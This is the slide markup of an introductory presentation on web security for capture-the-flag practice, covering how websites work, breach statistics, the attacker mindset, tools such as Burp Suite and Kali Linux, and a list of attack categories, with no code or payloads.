            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8439362" h="6030308">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8439362" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8439362" y="6030308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6030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 rot="5400000">
            <a:off x="-3868978" y="7052975"/>
            <a:ext cx="8439362" cy="6030308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8439362" h="6030308">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8439362" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8439362" y="6030307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6030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16773352" y="-181860"/>
            <a:ext cx="8439362" cy="6030308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8439362" h="6030308">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8439362" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8439362" y="6030308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6030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>
            <a:off x="7878284" y="3877784"/>
            <a:ext cx="2531432" cy="2531432"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2531432" h="2531432">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2531432" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2531432" y="2531432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2531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 rot="-10800000">
            <a:off x="6113561" y="4438499"/>
            <a:ext cx="1559675" cy="456511"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1559675" h="456511">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1559675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559675" y="456511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4565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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-10800000">
            <a:off x="11094565" y="4438499"/>
            <a:ext cx="1559675" cy="456511"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1559675" h="456511">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1559675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559675" y="456511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4565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Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11119708" y="5391990"/>
            <a:ext cx="1559675" cy="456511"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1559675" h="456511">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1559674" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559674" y="456511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4565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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138704" y="5391990"/>
            <a:ext cx="1559675" cy="456511"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1559675" h="456511">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1559675" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1559675" y="456511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4565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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908928" y="3738843"/>
            <a:ext cx="3339453" cy="2809315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3339453" h="2809315">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3339453" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3339453" y="2809314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28093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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13419472" y="3908484"/>
            <a:ext cx="2613790" cy="2470032"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2613790" h="2470032">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2613790" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2613790" y="2470032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24700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2" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293619" y="794093"/>
            <a:ext cx="13700762" cy="132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53"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8700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HOW WEBSITES WORKS?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1314" y="7224497"/>
            <a:ext cx="2505238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CLIENT SIDE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76126" y="7224497"/>
            <a:ext cx="2666477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WEB SERVER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1314" y="7954359"/>
            <a:ext cx="4468371" cy="1182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3077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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What users see (HTML, CSS, JavaScript).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Handles layout, buttons, forms.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76126" y="7954359"/>
            <a:ext cx="4758601" cy="198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3077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Runs backend code (PHP, Python, etc).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Talks to the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Sends processed data back to the client.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18720" y="7224497"/>
            <a:ext cx="2234186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INTERNET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18720" y="7954359"/>
            <a:ext cx="4468371" cy="158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3077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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middleman connecting browser to server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Sends requests and brings back responses.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61692" y="3682009"/>
            <a:ext cx="10012008" cy="171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446"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11299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5.5 BILLION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862408" y="5632124"/>
            <a:ext cx="8610577" cy="782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Numbers of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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breached accounts in 2024</a:t>
            </a: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meaning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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nearly 180 accounts were compromised every second</a:t>
            </a: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stated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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2" tooltip="https://surfshark.com/research/study/data-breach-recap-2024"/>
              </a:rPr>
              <a:t>SurfShark</a:t>
            </a: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7973611" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10631481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47000"/>
            </a:blip>
            <a:srcRect t="6995" b="6995"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10631481" cy="13716000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 rot="-5400000">
            <a:off x="12448133" y="-8452958"/>
            <a:ext cx="11679733" cy="11679733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11679733" h="11679733">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11679734" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11679734" y="11679733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11679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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="7973611" y="7434176"/>
            <a:ext cx="11679733" cy="11679733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11679733" h="11679733">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11679733" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11679733" y="11679733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116797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Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3242350">
            <a:off x="-1905490" y="5594554"/>
            <a:ext cx="6408517" cy="6408517"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6408517" h="6408517">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6408517" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6408517" y="6408517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="64085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6801" y="716205"/>
            <a:ext cx="15154398" cy="132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53"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8700" u="none" strike="noStrike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BASIC STRUCTURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14924316" y="-2604781"/>
            <a:ext cx="5762073" cy="4504894"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5762073" h="4504894">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5762073" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762073" y="4504893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4504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-1773896" y="9022260"/>
            <a:ext cx="5762073" cy="4504894"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5762073" h="4504894">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5762073" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5762073" y="4504893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4504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5" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6643136" y="2603067"/>
            <a:ext cx="4824284" cy="6137326"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1270593" cy="16164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0593" cy="1616415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1270593" h="1616415">
                  <a:moveTo>
                    <a:pt x="22467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1248126" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1260534" y="0"/>
                    <a:pt x="1270593" y="10059"/>
                    <a:pt x="1270593" y="22467"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1270593" y="1593948"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1270593" y="1599907"/>
                    <a:pt x="1268226" y="1605621"/>
                    <a:pt x="1264013" y="1609835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1259799" y="1614048"/>
                    <a:pt x="1254085" y="1616415"/>
                    <a:pt x="1248126" y="1616415"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22467" y="1616415"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10059" y="1616415"/>
                    <a:pt x="0" y="1606356"/>
                    <a:pt x="0" y="1593948"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="22467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10059"/>
                    <a:pt x="10059" y="0"/>
                    <a:pt x="2246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70593" cy="1664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2821" y="2603067"/>
            <a:ext cx="4824284" cy="6137326"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1270593" cy="16164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0593" cy="1616415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1270593" h="1616415">
                  <a:moveTo>
                    <a:pt x="22467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1248126" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1260534" y="0"/>
                    <a:pt x="1270593" y="10059"/>
                    <a:pt x="1270593" y="22467"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1270593" y="1593948"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1270593" y="1599907"/>
                    <a:pt x="1268226" y="1605621"/>
                    <a:pt x="1264013" y="1609835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1259799" y="1614048"/>
                    <a:pt x="1254085" y="1616415"/>
                    <a:pt x="1248126" y="1616415"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22467" y="1616415"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10059" y="1616415"/>
                    <a:pt x="0" y="1606356"/>
                    <a:pt x="0" y="1593948"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="22467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10059"/>
                    <a:pt x="10059" y="0"/>
                    <a:pt x="2246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70593" cy="1664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00895" y="2603067"/>
            <a:ext cx="4824284" cy="6137326"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1270593" cy="16164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70593" cy="1616415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1270593" h="1616415">
                  <a:moveTo>
                    <a:pt x="22467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1248126" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1260534" y="0"/>
                    <a:pt x="1270593" y="10059"/>
                    <a:pt x="1270593" y="22467"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1270593" y="1593948"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1270593" y="1599907"/>
                    <a:pt x="1268226" y="1605621"/>
                    <a:pt x="1264013" y="1609835"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1259799" y="1614048"/>
                    <a:pt x="1254085" y="1616415"/>
                    <a:pt x="1248126" y="1616415"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22467" y="1616415"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10059" y="1616415"/>
                    <a:pt x="0" y="1606356"/>
                    <a:pt x="0" y="1593948"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="22467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10059"/>
                    <a:pt x="10059" y="0"/>
                    <a:pt x="22467" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="305BC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70593" cy="1664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650470" y="4724493"/>
            <a:ext cx="1248985" cy="1354915"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1248985" h="1354915">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1248985" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248985" y="1354914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13549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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365200" y="4681458"/>
            <a:ext cx="1380158" cy="1397950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1380158" h="1397950">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1380157" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1380157" y="1397949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1397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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14528838" y="4681458"/>
            <a:ext cx="968398" cy="1397950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="968398" h="1397950">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="968398" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968398" y="1397949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13979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17" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8056458" y="3050651"/>
            <a:ext cx="1997640" cy="120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42"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8790" u="none" strike="noStrike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21093" y="6252791"/>
            <a:ext cx="4468371" cy="213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sz="2637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Finding the Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3771"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2637" b="1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marL="0" lvl="1" indent="0" algn="ctr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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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Look for flaws</a:t>
            </a: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such as broken authentication, injection, or misconfigurations.”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76143" y="3050651"/>
            <a:ext cx="1997640" cy="120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42"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8790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14217" y="3050651"/>
            <a:ext cx="1997640" cy="120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42"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8790" u="none" strike="noStrike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1290" y="6252791"/>
            <a:ext cx="4468371" cy="206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sz="2637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Understanding the Mindset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2637" b="1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marL="0" lvl="1" indent="0" algn="ctr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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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Think like an attacker</a:t>
            </a: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identify weak points in a website and how they can be abused.”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78852" y="6252791"/>
            <a:ext cx="4468371" cy="213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sz="2637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Exploiting and Learning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3771"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2637" b="1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marL="0" lvl="1" indent="0" algn="ctr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“Use controlled challenges to safely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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test, exploit, and understand the impact.</a:t>
            </a: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69748" y="3639839"/>
            <a:ext cx="3031042" cy="2910578"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3031042" h="2910578">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3031042" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3031042" y="2910579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2910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751" r="-3233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11688366" y="3656579"/>
            <a:ext cx="3186552" cy="2877098"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3186552" h="2877098">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3186552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3186552" y="2877098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2877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772" r="-11532" b="-10755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TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2598377" y="685091"/>
            <a:ext cx="13091245" cy="132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53"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8700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TOOLS NEEDED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14190" y="7227411"/>
            <a:ext cx="5742157" cy="2382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web security tool that sits between your browser and the website. It lets you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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intercept, view, and modify requests and responses</a:t>
            </a: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— very useful for finding and exploiting web vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2237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305439" y="7227411"/>
            <a:ext cx="4468371" cy="198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Linux operating system made for cybersecurity. It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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comes with many pre-installed tools</a:t>
            </a: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for penetration testing and CTFs, so you don’t need to set them up one by one.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94319" y="2705779"/>
            <a:ext cx="1781900" cy="52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34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Burp Suite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16476" y="2705779"/>
            <a:ext cx="4730333" cy="52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34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Kali Linux or Any Linux Distro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0000"/>
            </a:blip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4124615" y="-60815"/>
            <a:ext cx="5262362" cy="5565960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5262362" h="5565960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5262362" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5262362" y="5565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5565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>
            <a:off x="0" y="6475320"/>
            <a:ext cx="5262362" cy="5565960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5262362" h="5565960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5262362" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5262362" y="5565960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5565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>
            <a:off x="3550658" y="1201053"/>
            <a:ext cx="10787791" cy="7884894"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10787791" h="7884894">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787790" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787790" y="7884894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7884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TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5846654" y="4093447"/>
            <a:ext cx="7190097" cy="422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3"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3884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Finding Hidden Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="8623"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3884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Broken Access Controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="8623"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3884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Injection Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="8623"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3884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Client-Side Attacks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96112" y="2636440"/>
            <a:ext cx="8709991" cy="141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74"/>
